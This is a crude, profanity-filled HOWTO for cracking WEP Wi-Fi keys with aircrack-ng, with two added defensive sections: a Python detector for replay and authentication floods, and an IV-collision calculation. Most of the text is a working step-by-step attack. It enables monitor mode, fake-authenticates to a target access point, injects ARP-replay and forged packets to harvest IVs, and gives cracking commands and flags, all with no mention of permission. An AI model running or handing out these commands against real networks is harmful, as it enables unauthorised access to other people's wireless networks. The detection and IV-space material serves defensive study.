WEP Cracking HOWTO
by asbesto && lechuck
I wrote this HOWTO because I was sick and tired of all that online shit. Every fuckin' document that claims to explain how to crack a fracking WEP really doesn't explain a SINGLE FUCK: it links other manual pages, makes useless and unexplained examples, and links yet more incomplete help pages. So you know what? FUCK YOU, if you wrote a piece of SHIT called HOWTO and you just link help pages, well, that's not a HOWTO, THAT'S A FUCKING STEAMING PILE OF BLOODY SHIT.
Thanks to Lechuck, without him this work would never have been possible.
So, this is a HOWTO: if you follow this document STEP BY STEP, you OBTAIN RESULTS, NOW.
What to install
Obviously you need the aircrack suite, now called aircrack-ng only because the old aircrack is no longer developed. WHAT - THE - FUCK. I don't get why in THE HELL the fucking developers renamed it instead of GIVING AN ACTUAL FUCK and calling the new project exactly like the old one!
So:
sudo apt-get install aircrack-ng
Set up your network card
Assuming that your wifi card is wlan0, just use
airmon-ng start wlan0 1
so you have just activated the mon0 interface. Sometimes you will get warning messages about daemons interfering and creating problems, shit like avahi, networkmanager, and other useless shit. KILL THEM ALL. You don't need to re-run airmon-ng.
Facts
Assuming the WEP AP to crack is called Diolink-22334455 with MAC address (bssid) AP:AP:AP:AP:AP:AP,
and my wlan0 address is IO:IO:IO:IO:IO:IO.
FIRST: let's dump some data
airodump-ng -c 1 -b AP:AP:AP:AP:AP:AP -t wep -w output.cap mon0
SECOND: aireplay #1
Open another shell:
aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
You will get something like
16:55:37  Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1
16:55:37  Sending Authentication Request (Open System)
16:55:37  Authentication successful
16:55:37  Sending Association Request
16:55:37  Association successful :-) (AID: 1)
root@lem:~#
FUCKING GOOD, it means you can authenticate. Now launch
aireplay-ng -3 -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
You get something like
16:57:27  Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1
Saving ARP requests in replay_arp-0629-165727.cap
You should also start airodump-ng to capture replies.
Read 1427 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
The packet count begins to rise. 0 ARP is BAD, so let's move on to the third phase.
THIRD: another aireplay
Open a third shell; we can try to authenticate again while the other 2 shells are running:
aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
If this creates some ARP, well, that's GREAT! If it creates only ACKs, they're not useful, so fuck them all. Again in the third shell, we can try
aireplay-ng -2 -p 0841 -m 68 -n 86 -c FF:FF:FF:FF:FF:FF -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
This is aireplay interactive mode: it forges packets to DO SHIT. In theory, you should answer Y to a forged packet only if its length is 68 or 86. It reads the packets, thinks about them, does some magic and creates them.
68 = length of an ARP from a wifi client. 86 for a wired one.
BUT I DON'T GIVE A FUCK: it gave me a 76, and I SAID FUCK YES!
After a while, I try
aircrack-ng filename.dump
And here they are, 76000 IVs!!!!! LET'S START THE CRACKING PARTY!
It's pumping along: it sees the file still growing, and when a "failed" comes out, it simply restarts...
IT'S DONE. JUST A MATTER OF TIME.
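Seen from the other side of the air, the replay phase described above is loud: one station pushes hundreds of data frames of one exact encrypted length (the 68/86-byte ARP sizes named above) every second, after a burst of open-system authentication requests. The following detector is an added example written for this page from the defender's side; it is not part of the HOWTO and not aircrack-ng code. It works over a constructed list of frame records (timestamp, source MAC, frame kind, length); the station addresses and the thresholds (100 same-length data frames per second, 5 authentication requests per 10 seconds) are assumptions to tune per site.

```python
from collections import Counter, defaultdict

# Constructed station addresses (placeholders, not real devices)
STA_INJECT = "02:11:22:33:44:55"   # station replaying one encrypted ARP frame
STA_LEGIT = "02:aa:bb:cc:dd:ee"    # station with ordinary, varied traffic


def build_sample_frames():
    """Constructed sample capture, not real traffic.

    Each record is (timestamp_s, source_mac, frame_kind, frame_length);
    frame_kind is 'auth' for an 802.11 authentication request or 'data'.
    """
    frames = []
    # Ordinary traffic: 200 data frames over 20 s with varied lengths.
    for i in range(200):
        frames.append((i * 0.1, STA_LEGIT, "data", 60 + (i * 37) % 900))
    # Repeated open-system authentication attempts from one station.
    for i in range(6):
        frames.append((5.0 + i * 0.5, STA_INJECT, "auth", 30))
    # Replay burst: 600 data frames of exactly 68 bytes in under one second,
    # the shape an ARP-replay injection produces on the air.
    for i in range(600):
        frames.append((10.0 + i / 700.0, STA_INJECT, "data", 68))
    frames.sort(key=lambda rec: rec[0])
    return frames


def find_replay_bursts(frames, window_s=1.0, min_frames=100):
    """Return {(src, length): [(bucket, count), ...]} for every station that
    sent at least min_frames data frames of one exact length inside a single
    window_s-long time bucket. Thresholds are assumptions, tune them per site."""
    buckets = Counter()
    for t, src, kind, length in frames:
        if kind == "data":
            buckets[(src, length, int(t // window_s))] += 1
    alerts = defaultdict(list)
    for (src, length, bucket), n in buckets.items():
        if n >= min_frames:
            alerts[(src, length)].append((bucket, n))
    return dict(alerts)


def find_auth_floods(frames, window_s=10.0, min_auth=5):
    """Return {src: most authentication requests seen in one window} for
    stations sending at least min_auth of them inside one window_s bucket."""
    buckets = Counter()
    for t, src, kind, _length in frames:
        if kind == "auth":
            buckets[(src, int(t // window_s))] += 1
    worst = {}
    for (src, _bucket), n in buckets.items():
        if n >= min_auth:
            worst[src] = max(n, worst.get(src, 0))
    return worst


if __name__ == "__main__":
    sample = build_sample_frames()
    for (src, length), hits in find_replay_bursts(sample).items():
        for bucket, n in hits:
            print(f"replay burst: {src} sent {n} x {length}-byte frames in second {bucket}")
    for src, n in find_auth_floods(sample).items():
        print(f"auth flood: {src} sent {n} authentication requests in one window")
```

Run as a script it prints one replay-burst line for the injecting station and one auth-flood line; the ordinary station never trips either rule because its frame lengths vary and its rate stays low. Feeding it real records means mapping your capture tool's output onto the same four fields; the per-second bucketing is deliberately simple so the rule is easy to reason about when tuning the thresholds.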
THE BIG DEAL
aircrack-ng -K -M 4981430 -f 3 -b 00:25:53:1A:AB:B4 -s output.cap-01.cap
-s shows ASCII. -K is useful; playing with -f you can crack 100%.
With -f 4 I found the key.
-b must be specified; if not, BAD SHIT HAPPENS.
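The numbers on this page (76000 IVs collected in a sitting, a -M cap in the millions) are only alarming once you see how small WEP's 24-bit IV space is. The following calculation is an added example for this page, not code from the HOWTO or from aircrack-ng; it uses only the IV width and the standard birthday-bound arithmetic, and the 500 frames-per-second figure in the usage is an assumed injection rate, not a value from the page.

```python
import math

IV_BITS = 24                      # WEP prepends a 24-bit IV to the RC4 key
IV_SPACE = 2 ** IV_BITS           # 16,777,216 distinct IVs per key


def expected_iv_collisions(n_frames, iv_space=IV_SPACE):
    """Expected number of IV pairs that repeat among n_frames frames when the
    sender picks IVs uniformly at random: C(n, 2) / iv_space."""
    return n_frames * (n_frames - 1) / (2 * iv_space)


def frames_until_reuse_probability(p, iv_space=IV_SPACE):
    """Smallest frame count at which the probability of at least one IV
    reuse (random IVs) reaches p, from the exact birthday product."""
    prob_no_reuse = 1.0
    n = 1
    while 1.0 - prob_no_reuse < p:
        # frame n+1 must avoid the n IVs already seen
        prob_no_reuse *= (iv_space - n) / iv_space
        n += 1
    return n


def iv_space_fraction(n_frames, iv_space=IV_SPACE):
    """Fraction of the whole IV space that n_frames distinct IVs cover."""
    return n_frames / iv_space


def seconds_to_exhaust_ivs(frames_per_second, iv_space=IV_SPACE):
    """Seconds until a sequential-IV sender has used every IV once, after
    which every further frame reuses a keystream."""
    return iv_space / frames_per_second


if __name__ == "__main__":
    print(f"IV space: {IV_SPACE} values ({IV_BITS} bits)")
    print(f"frames until 50% chance of an IV reuse: "
          f"{frames_until_reuse_probability(0.5)}")
    for n in (76000, 1_000_000):
        print(f"{n} frames cover {iv_space_fraction(n):.2%} of the IV space, "
              f"expected colliding pairs: {expected_iv_collisions(n):.0f}")
    # Assumed injection rate, not a figure from the page
    hours = seconds_to_exhaust_ivs(500) / 3600
    print(f"at 500 frames/s the whole IV space is used up in {hours:.1f} hours")
```

The point of the output is the mismatch of scales: a few thousand frames already make an IV reuse more likely than not, 76000 frames (well under one percent of the space) carry on the order of 170 repeated-IV pairs, and at a few hundred frames per second a key's entire IV space is consumed in hours. No key length or cracking flag changes those figures, which is why the only mitigation for a WEP network is to stop using WEP.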
Scratchpad
aircrack-ng -K file.dump or file.ivs
-k is a cracking algorithm: -k <korek>. There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.
-y This is an experimental single brute-force attack which should only be used when the standard attack mode fails with more than one million IVs.
-z Uses the PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Weinmann) attack.
In some cases (AKA al**ce adsl :) you want to use -z (sometimes you can't crack it with >1 million IVs, because the default algorithm fails) [lobo]